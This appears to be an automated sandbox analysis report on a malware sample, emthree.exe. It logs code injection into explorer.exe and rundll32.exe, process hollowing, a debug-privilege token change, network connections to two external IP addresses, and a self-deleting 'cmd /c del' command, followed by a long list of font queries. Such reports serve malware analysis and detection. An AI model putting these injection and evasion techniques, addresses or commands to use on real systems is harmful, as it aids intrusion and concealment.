Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04ECAE73 mov eax, dword ptr fs:[00000030h]	6_2_04ECAE73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04ECAE73 mov eax, dword ptr fs:[00000030h]	6_2_04ECAE73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04ECAE73 mov eax, dword ptr fs:[00000030h]	6_2_04ECAE73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04ECAE73 mov eax, dword ptr fs:[00000030h]	6_2_04ECAE73

Source: C:\Users\user\Desktop\emthree.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\emthree.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 23.27.109.19 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 184.154.50.243 80			Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\emthree.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\emthree.exe	Thread register set: target process: 3472			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread register set: target process: 3472			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\emthree.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\emthree.exe

Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: AC0000

Jump to behavior

Source: C:\Users\user\Desktop\emthree.exe	Process created: C:\Users\user\Desktop\emthree.exe {path}			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\emthree.exe'			Jump to behavior

Source: explorer.exe, 00000002.00000002.503348798.0000000005EA0000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000002.490167747.0000000003730000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.242251394.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.490167747.0000000003730000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.242251394.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.490167747.0000000003730000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000002.00000002.488072734.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000002.00000000.242251394.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.490167747.0000000003730000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000002.00000000.242251394.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.490167747.0000000003730000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Users\user\Desktop\emthree.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\emthree.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
